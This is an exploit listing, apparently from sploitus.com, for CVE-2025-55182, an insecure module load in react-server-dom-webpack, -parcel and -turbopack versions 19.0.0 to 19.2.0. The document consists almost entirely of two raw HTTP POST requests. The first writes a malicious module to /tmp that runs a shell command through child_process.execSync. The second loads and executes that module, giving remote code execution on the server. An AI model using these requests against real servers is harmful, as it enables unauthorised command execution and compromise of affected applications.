Share
## https://sploitus.com/exploit?id=5E9A6165-7807-5F02-A0F5-0DD3D2A951B3
# CVE-2025-55182
Raw HTTP Requests to exploit the insecure lazy module load in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0.

Prerequisite: **fs** and **module** packages are loaded

### Request 1/2 (write malicious module to disk via writeFileSync)

```
POST /form HTTP/1.1
Content-Type: multipart/form-data; boundary=----FormBoundary
Content-Length: 354
Host: 
Connection: keep-alive

------FormBoundary
Content-Disposition: form-data; name="$ACTION_REF_0"


------FormBoundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"fs#writeFileSync","bound":["/tmp/evil-module.js","const result = require('child_process').execSync('whoami').toString().trim();module.exports = 'result: ' + result;"]}

------FormBoundary--

```

### Request 2/2 (load and execute the JS code defined in module previously written to disk)

```
POST /form HTTP/1.1
Content-Type: multipart/form-data; boundary=----FormBoundary
Content-Length: 229
Host: 
Connection: keep-alive

------FormBoundary
Content-Disposition: form-data; name="$ACTION_REF_0"


------FormBoundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"module#_load","bound":["/tmp/evil-module.js"]}

------FormBoundary--

```